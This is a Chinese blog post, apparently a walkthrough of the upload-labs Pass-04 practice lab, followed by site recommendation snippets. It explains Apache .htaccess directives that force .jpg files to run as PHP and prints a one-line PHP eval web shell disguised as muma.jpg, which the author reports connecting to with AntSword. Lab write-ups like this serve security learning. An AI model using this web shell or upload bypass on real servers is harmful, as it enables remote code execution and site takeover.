.htaccess文件上传解析漏洞

最新推荐文章于 2024-04-28 23:02:18 发布
最新推荐文章于 2024-04-28 23:02:18 发布
阅读量7.1k 收藏 29
点赞数 9
分类专栏: web安全成长之路 文章标签: 安全 web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mmzkyl/article/details/112138834
版权

  • 测试环境

    upload-labs靶场(Pass-04)
     
     

  • .htaccess原理

    .htaccess文件是Apache服务器下的一个配置文件。其主要负责相关目录下的网页配置,即:在一个特定的文档目录中放置一个包含一个或多个指令的文件来对网页进行配置。
    不过需要注意的是,.htaccess文件的作用域为其所在目录与其所有的子目录,不过若是子目录也存在.htaccess文件,则会覆盖父目录的.htaccess效果。
     
     

  • .htaccess实例


<ifModule mime_module>

AddHandler php5-script .jpg
<!-- 将.jpg文件按照php代码进行解析执行 -->

AddType application/x-httpd-php .jpg
<!-- 将.jpg文件按照php代码进行解析执行 -->

Sethandler application/x-httpd-php
<!-- 将该目录及子目录下的文件均按照php文件解析执行 -->

</ifModule>
<!-- 该种匹配方式并不推荐,极易造成误伤 -->


<FilesMatch "muma.jpg">

Sethandler application/x-httpd-php
<!-- 将匹配到的 muma.jpg 文件按照php解析执行 -->

Addhandler php5-script .jpg
<!-- 将匹配到的 muma.jpg 文件按照php解析执行 -->

</FilesMatch>
<!-- 该种匹配方式较为精准,不会造成大批的误伤情况 -->

下面来说一下这几种写法的区别:

  • Sethandler 指令:
    将该目录及子目录的所有文件均映射为php文件类型
  • Addhandler 指令:
    使用 php5-script 处理器来解析所匹配到的文件
  • AddType 指令
    将特定扩展名文件映射为php文件类型
     
     

  • Upload-labs(Pass-04)

这一关的漏洞便在于 .htaccess 文件上传解析漏洞,使用上面我们所提到的知识便能够通过这一关
在这里插入图片描述我们需要先准备好两个文件(.htaccess 和 muma.jpg

<!-- .htaccess文件 -->
<FilesMatch "muma.jpg">
Sethandler application/x-httpd-php
</FilesMatch>

//muma.jpg
<?php @eval($_POST["test"]); ?>

接下来就是先将 .htaccess 文件上传,从而覆盖父目录对上传目录的影响,然后再上传 muma.jpg 文件,从而完成 .htaccess 文件上传解析漏洞的利用
放一个该关卡蚁剑成功连接的图片
在这里插入图片描述 
 
由于作者也是在学习之中,所以文章错误之处还请在评论区指正

个人新建博客,欢迎访问

mmzkyl
关注
  • 9
    点赞
  • 29
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Web安全--文件上传漏洞
bobo_milk的博客
11-11 1104
本文参考了一些文章,如有侵权请留言删除。该文章基于upload-labs基础靶场进行编写。
upload-labs(1-7)关
weixin_43825758的博客
04-14 446
upload-labs源码地址:https://github.com/c0ny1/upload-labs 第一关 前端js验证 如果上传php文件,不允许 f12,查看js代码,删掉 或者burp 把png文件改php文件 打开文件,用菜刀或蚁剑连(其实也可以phpinfo的,不需连,打开文件看效果) 第二关 MIME验证 用burp与第一关类似,仅判断content-type中的类型,故将content-type改为图片类型image/jpeg、image/png、image/gif 第三关 特
解决Apache无法解析PHP问题
热门推荐
纸上得来终觉浅
12-13 3万+
编辑httpd.conf文件添加如下代码LoadModule php7_module modules/libphp7.so AddType application/x-httpd-php .php DirectoryIndex index.php index.htm index.html第一句,装完php就自动生成
WEB入门——文件上传漏洞
HasntStartIsOver的博客
06-04 5361
文件上传漏洞服务端代码未对客户端上传的文件进行严格的验证,导致漏洞。如果.php后缀被限制,可以尝试:.php3、php4、.PHp(修改大小写)、.phtml、.pht等后缀,WebShell的内容一样。这两个配置的意思就是:我们指定一个文件,那么该文件就会被包含在要执行的php文件中(如index.php)。如果客户端JS脚本有加限制(例如上传图片,JS脚本显示了只能上传图片格式,不能上传.php后缀的文件)。1、上传的文件是web脚本语言,服务器的web容器解释并执行了用户上传的脚本,脚本语言执行。
【网络安全文件上传漏洞详解】(1)
最新发布
2301_82242964的博客
04-28 1153
修改路径值,添加%00,然后提交。与白名单相反,通过限制某些文件格式,使其无法上传之服务端。只存在于APACHE中主要功能:URL重写、自定义错误页面、MIME类型配置以及访问权限控制等。主要体现在伪静态的应用、图片防盗链、自定义404错误页面、阻止/允许特定IP/IP段、目录浏览与主页、禁止访问指定文件类型、文件密码保护等。
文件上传漏洞详解
剁椒鱼头没剁椒的博客
11-28 2万+
文件上传漏洞web系统中常见的一种功能,通过文件上传能实现上传图片、视频,以及其他类型的文件,但是随着web中包含的功能越来越多,潜在的网络安全风险也就越大。如果恶意用户上传了可执行的文件或者脚本,就会导致网站被其控制甚至会使其服务器沦陷,以至于引发恶意的网络安全事件。编辑器也就是在线的web编辑器,比如在搭建博客后需要发布文章,那么用来发布文章的界面就是web编辑器。
全网最全超详细.htaccess语法讲解
张无忌
06-24 7221
概述来说,htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。Unix、Linux系统或者是任何版本的Apache Web服务器都是支持.htaccess的,但是有的主机服务商可能不允许你自定义自己的.htaccess文件。.htaccess文件可以的事情,主要包括:文件夹密码保护、用户自定义重定向、自定义4
Upload-labs-master-Pass-04通关教程——.htaccess绕过
qq_39330735的博客
02-07 530
通过.htaccess文件来配合Apache解析机制来绕过。
uploads-labs pass 4 配置apache使.htaccess文件生效
qq_51161511的博客
06-05 149
之后开始编写.htaccess文件并上传,该文件用于将jpg文件作为php代码解析,这两步已经有详细教程。而实现该文件有效性需要更改apache配置文件,具备两个条件,先搜索allowoverride,找到275行左右位置将None改成All,意思应该是允许覆盖写权限。(留意上下文,不要改错了,该文件有多处allowride)首先分析源代码可知该网页已经过滤了大多数的文件拓展名,无法直接上传木马文件。重启apache服务,将两个文件上传后,使用中国蚁剑确认连接。
文件上传漏洞08】.htaccess攻击实验(基于upload-labs-4靶场)
Fighting_hawk的博客
03-02 3988
1. 当存在文件上传漏洞时,只要恶意代码没有被过滤,就存在被执行的危险。 2. 掌握修改.htaccess以改变各种文件执行程序的方法。
Web安全文件上传漏洞测试(防止 黑客利用此漏洞.)
网络安全领域___专研者.
05-21 2513
现在大多的网站和Web应用系统都会有上传功能(比如:文档,图片,头像,视频上传等.),而程序员在开发文件上传功能时,没有对代码做严格校验上传文件的后缀和文件类型. 此时攻击者就可以上传一个与网站脚本语言相对应的恶意代码动态脚本,例如(php,jsp、aspx,asp文件后缀)到服务器上,并将恶意文件传递给网站脚本语言去执行,然后就可以在服务器上执行恶意代码,进行数据库执行、服务器文件管理,服务器命令执行等恶意操作.
.htaccess的利用方法和技巧
snowlyzz的博客
08-10 1939
关于htaccess 的妙用
.htaccess文件及web漏洞介绍
Marsper的博客
11-08 1552
htaccess文件 .htaccess攻击 .htaccess是Apache服务器的分布式配置文件,该配置文件会覆盖Apache服务器的全局配置,作用域是当前目录及其子目录。 如果一个web应用允许上传.htaccess 文件,那就意味着攻击者可以更改Apache 的配置,这是十分危险。.htaccess攻击想象空间非常大。 首先看Apache 的配置,允许.htaccess文件覆盖掉Apache 的配置。 若配置文件中有如图中一样,即表示允许被覆盖。 *将.png文件当作PHP文件解析 将以下代码写入
警惕htaccess文件上传解析漏洞
whatiwhere的博客
11-24 9414
实验环境 操作机: Windows XP 目标机:Windows 2003 目标网址:www.test.com 实验目的 了解htaccess文件解析的利用方法 掌握如何去修复此漏洞 实验工具 中国菜刀:是一款专业的网站管理软件,用途广泛,使用方便,小巧实用。只要支持动态脚本的网站,都可以用中国菜刀来进行管理,本次试验主要用到其动态脚本管理功能 实验内容 实验步骤 步骤1:...
虚拟主机绑定多个网站htaccess写法
不定时分享最优质的网络技术与教程,满满的干货。
12-13 201
m.yangqq.net 是二级域名。保存文档为.htaccess。/m 是存放的文件夹名称。
Node.js中模块加载机制
Tiger's blog
09-27 188
Node.js中模块查找规则: 【注】以下查找规则均来自于在VS Code中的实践,对于文件以及相应文件的截图太多,比较麻烦,就以文字形式呈现出来。 1.当模块拥有路径但没有后缀时 require('./home.js') require('./home') (1)当路径完整时,直接引入模块文件,读取。 (2)当路径不完整时,首先查找同名文件,如果查找到同名文件,则会查找当前文件夹下的package.json文件中的main选项中的入口文件,但入口文件要求在当前文件夹下; 如果找不到入口文件,则会查找当
.htaccess详解
小迷童
05-29 1399
.htaccess是什么 .htaccess文件(或者"分布式配置文件")提供了针对目录改变配置的方法, 即,在一个特定的文档目录中放置一个包含一个或多个指令的文件, 以作用于此目录及其所有子目录。作为用户,所能使用的命令受到限制。管理员可以通过Apache的AllowOverride指令来设置。 概述来说,htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网
.htaccess使用指南
prudence_xu的专栏
09-20 843
Apache服务器的.htaccess是一个非常强大的分布式配置文件,学会使用.htaccess,对虚拟主机用户来说,可以实现众多的功能。这里有一篇很容易让人理解的.htaccess介绍,作为入门文章非常的适合。文章最初来自freewebmasterhelp.com,QiRan作了简单的中文翻译,我将加以完善。 Part 1 – Introduction介绍
开发利器 Emeditor
霍城延的随笔
12-25 537
今天给大家推荐一款利器,它比windows 自带的记事本,功能要强大一百倍。。。不 一万倍。。。扯呼。。来看具体使用吧。 一、 支持的文件种类丰富 如图所示,不在做具体的列举。 二、编码多样化 三、文件预览 四、排序功能强大 五、标尺 六、搜索功能强大 1. 文本搜索 2. 文件搜索(文件夹,文件内容,文件格式、文件层级、)等等 七、宏使用 八、文件比较 九、CSV支持 十、 大文件预览 众所周知,windows自带...
.htaccess文件上传漏洞复现
06-03
请注意,.htaccess文件本身并不会造成上传漏洞,它是一种用于配置Apache服务器的文件。我猜测您的问题是如何利用配置错误或者漏洞上传.htaccess文件来实现服务器攻击的。 一些常见的.htaccess文件上传漏洞如下: 1. 目录遍历漏洞: 如果一个服务器上的网站没有正确限制文件上传的目录,攻击者可以上传包含攻击代码的.htaccess文件到网站的某个目录,然后通过访问该目录下的文件来执行攻击代码。 2. 文件名绕过漏洞: 有些服务器在处理上传的文件名时可能会忽略.htaccess后缀,因此攻击者可以上传包含攻击代码的.htaccess文件并将其命名为其他文件类型的后缀名,例如.php、.jpg、.gif等,然后通过访问该文件来执行攻击代码。 3. MIME类型绕过漏洞: 攻击者可以上传一个包含攻击代码的.htaccess文件,并在其中设置MIME类型为可执行文件,这样当服务器处理该文件时就会将其作为可执行文件来执行其中的代码。 请注意,这些漏洞都是由于服务器配置错误或者漏洞造成的,因此最好的解决方法是及时更新服务器软件并开启安全防护措施,例如限制上传文件的类型、大小、目录等。同时,还应该定期检查服务器配置和日志来发现潜在的安全问题。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值